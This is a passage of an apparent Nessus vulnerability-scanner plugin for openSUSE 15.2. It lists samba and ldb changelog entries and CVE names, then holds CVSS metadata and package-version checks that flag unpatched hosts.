libsmb: Don't try to find posix stat info in\n SMBC_getatr().\n\n + ctdb-tcp: Move free of inbound queue to TCP restart;\n (bso#14295); (bsc#1162680).\n\n + s3/librpc/crypto: Fix double free with unresolved\n credential cache; (bso#14344); (bsc#1169095)\n\n + s3:libads: Fix ads_get_upn(); (bso#14336).\n\n + CTDB recovery corner cases can cause record resurrection\n and node banning; (bso#14294)\n\n + Starting ctdb node that was powered off hard before\n results in recovery loop; (bso#14295); (bsc#1162680).\n\n + ctdb-recoverd: Avoid dereferencing NULL rec->nodemap;\n (bso#14324)\n\n - Update to samba 4.11.8\n\n + CVE-2020-10700: Use-after-free in Samba AD DC LDAP\n Server with ASQ; (bso#14331); (bsc#1169850);\n\n + CVE-2020-10704: LDAP Denial of Service (stack overflow)\n in Samba AD DC; (bso#14334); (bsc#1169851);\n\n - Update to samba 4.11.7\n\n + s3: lib: nmblib. Clean up and harden nmb packet\n processing; (bso#14239).\n\n + s3: VFS: full_audit. Use system session_info if called\n from a temporary share definition; (bso#14283)\n\n + dsdb: Correctly handle memory in objectclass_attrs;\n (bso#14258).\n\n + ldb: version 2.0.9, Samba 4.11 and later give incorrect\n results for SCOPE_ONE searches; (bso#14270)\n\n + auth: Fix CIDs 1458418 and 1458420 NULL pointer\n dereferences; (bso#14247).\n\n + smbd: Handle EINTR from open(2) properly; (bso#14285)\n\n + winbind member (source3) fails local SAM auth with empty\n domain name; (bso#14247)\n\n + winbindd: Handling missing idmap in getgrgid();\n (bso#14265).\n\n + lib:util: Log mkdir error on correct debug levels;\n (bso#14253).\n\n + wafsamba: Do not use 'rU' as the 'U' is deprecated in\n Python 3.9; (bso#14266).\n\n + ctdb-tcp: Make error handling for outbound connection\n consistent; (bso#14274).\n\n - Update to samba 4.11.6\n\n + pygpo: Use correct method flags; (bso#14209).\n\n + vfs_ceph_snapshots: Fix root relative path handling;\n (bso#14216); (bsc#1141320).\n\n + Avoiding bad call flags with python 3.8, using\n METH_NOARGS instead of zero; (bso#14209).\n\n + source4/utils/oLschema2ldif: Include stdint.h before\n cmocka.h; (bso#14218).\n\n + docs-xml/winbindnssinfo: Clarify interaction with\n idmap_ad etc; (bso#14122).\n\n + smbd: Fix the build with clang; (bso#14251).\n\n + upgradedns: Ensure lmdb lock files linked; (bso#14199).\n\n + s3: VFS: glusterfs: Reset nlinks for symlink entries\n during readdir; (bso#14182).\n\n + smbc_stat() doesn't return the correct st_mode and also\n the uid/gid is not filled (SMBv1) file; (bso#14101).\n\n + librpc: Fix string length checking in\n ndr_pull_charset_to_null(); (bso#14219).\n\n + ctdb-scripts: Strip square brackets when gathering\n connection info; (bso#14227).\n\n - Add libnetapi-devel to baselibs conf, for wine usage;\n (bsc#1172307);\n\n - Installing: samba - samba-ad-dc.service does not exist\n and unit not found; (bsc#1171437);\n\n - Fix samba_winbind package is installing python3-base\n without python3 package; (bsc#1169521);\n\nChanges in ldb :\n\n - Update to version 2.0.12\n\n + CVE-2020-10730: NULL de-reference in AD DC LDAP server\n when ASQ and VLV combined; (bso#14364); (bsc#1173159).\n\n + ldb_ldap: fix off-by-one increment in lldb_add_msg_attr;\n (bso#14413).\n\n + lib/ldb: add unit test for ldb_ldap internal code.\n\n - Update to version 2.0.11\n\n + lib ldb: lmdb init var before calling mdb_reader_check.\n\n + lib ldb: lmdb clear stale readers on write txn start;\n (bso#14330).\n\n + ldb tests: Confirm lmdb free list handling\n\nThis update was imported from the SUSE:SLE-15-SP2:Update update\nproject.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1141320\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1162680\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1169095\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1169521\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1169850\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1169851\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1171437\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1172307\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1173159\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1173160\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1173161\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1173359\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1174120\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Update the affected ldb / samba packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ctdb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ctdb-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ctdb-pcp-pmda\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ctdb-pcp-pmda-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ctdb-tests\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ctdb-tests-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ldb-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ldb-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ldb-tools-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-binding0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-binding0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-binding0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-binding0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-samr-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-samr0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-samr0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-samr0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-samr0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libldb-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libldb2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libldb2-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libldb2-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libldb2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-krb5pac-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-krb5pac0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-krb5pac0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-krb5pac0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-krb5pac0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-nbt-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-nbt0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-nbt0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-nbt0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-nbt0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-standard-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-standard0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-standard0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-standard0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-standard0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libnetapi-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libnetapi-devel-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libnetapi0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libnetapi0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libnetapi0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libnetapi0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-credentials-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-credentials0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-credentials0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-credentials0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-credentials0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-errors-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-errors0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-errors0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-errors0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-errors0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-hostconfig-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-hostconfig0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-hostconfig0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-hostconfig0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-hostconfig0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-passdb-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-passdb0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-passdb0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-passdb0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-passdb0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-policy-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-policy-python3-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-policy0-python3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-policy0-python3-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-policy0-python3-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-policy0-python3-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-util-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-util0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-util0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-util0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-util0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamdb-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamdb0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamdb0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamdb0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamdb0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbclient-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbclient0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbclient0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbclient0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbclient0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbconf-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbconf0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbconf0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbconf0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbconf0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbldap-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbldap2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbldap2-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbldap2-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbldap2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtevent-util-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtevent-util0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtevent-util0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtevent-util0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtevent-util0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwbclient-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwbclient0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwbclient0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwbclient0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwbclient0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python3-ldb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python3-ldb-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python3-ldb-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python3-ldb-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python3-ldb-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-ad-dc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-ad-dc-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-ad-dc-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-ad-dc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-ceph\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-ceph-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-client-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-client-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-client-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-core-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-dsdb-modules\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-dsdb-modules-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-libs-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-libs-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-libs-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-libs-python3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-libs-python3-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-libs-python3-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-libs-python3-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-python3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-python3-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-test\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-test-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-winbind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-winbind-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-winbind-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-winbind-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.2\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/05/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/07/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/07/21\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.2\", reference:\"ctdb-4.11.11+git.180.2cf3b203f07-lp152.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"ctdb-debuginfo-4.11.11+git.180.2cf3b203f07-lp152.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"ctdb-pcp-pmda-4.11.11+git.180.2cf3b203f07-lp152.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"ctdb-pcp-pmda-debuginfo-4.11.11+git.180.2cf3b203f07-lp152.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"ctdb-tests-4.11.11+git.180.2cf3b203f07-lp152.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"ctdb-tests-debuginfo-4.11.11+git.180.2cf3b203f07-lp152.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"ldb-debugsource-2.0.12-lp152.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"ldb-tools-2.0.12-lp152.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"ldb-tools-debuginfo-2.0.12-lp152.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libdcerpc-binding0-4.11.11+git.180.2cf3b203f07-lp152.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libdcerpc-binding0-debuginfo-4.11.11+git.180.2cf3b203f07-lp152.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libdcerpc-devel-4.11.11+git.180.2cf3b203f07-lp152.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libdcerpc-samr-devel-4.11.11+git.180.2cf3b203f07-lp152.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libdcerpc-samr0-4.11.11+git.180.2cf3b203f07-lp152.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libdcerpc-samr0-debuginfo-4.11.11+git.180.2cf3b203f07-lp152.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libdcerpc0-4.11.11+git.180.2cf3b203f07-lp152.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libdcerpc0-debuginfo-4.11.11+git.180.2cf3b203f07-lp152.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libldb-devel-2.0.12-lp152.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libldb2-2.0.12-lp152.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libldb2-debuginfo-2.0.12-lp152.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libndr-devel-4.11.11+git.180.2cf3b203f07-lp152.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libndr-krb5pac-devel-4.11.11+git.180.2cf3b203f07-lp152.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libndr-krb5pac0-4.11.11+git.180.2cf3b203f07-lp152.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libndr-krb5pac0-debuginfo-4.11.11+git.180.2cf3b203f07-lp152.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libndr-nbt-devel-4.11.11+git.180.2cf3b203f07-lp152.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libndr-nbt0-4.11.11+git.180.2cf3b203f07-lp152.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libndr-nbt0-debuginfo-4.11.11+git.180.2cf3b203f07-lp152.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libndr-standard-devel-4.11.11+git.180.2cf3b203f07-lp152.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libndr-standard0-4.11.11+git.180.2cf3b203f07-lp152.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libndr-standard0-debuginfo-4.11.11+git.180.2cf3b203f07-lp152.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libndr0-4.11.11+git.180.2cf3b203f07-lp152.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libndr0-debuginfo-4.11.11+git.180.2cf3b203f07-lp152.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libnetapi-devel-4.11.11+git.180.2cf3b203f07-lp152.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libnetapi0-4.11.11+git.180.2cf3b203f07-lp152.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libnetapi0-debuginfo-4.11.11+git.180.2cf3b203f07-lp152.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsamba-credentials-devel-4.11.11+git.180.2cf3b203f07-lp152.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsamba-credentials0-4.11.11+git.180.2cf3b203f07-lp152.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsamba-credentials0-debuginfo-4.11.11+git.180.2cf3b203f07-lp152.3.3.1\") ) flag++;\nif ( 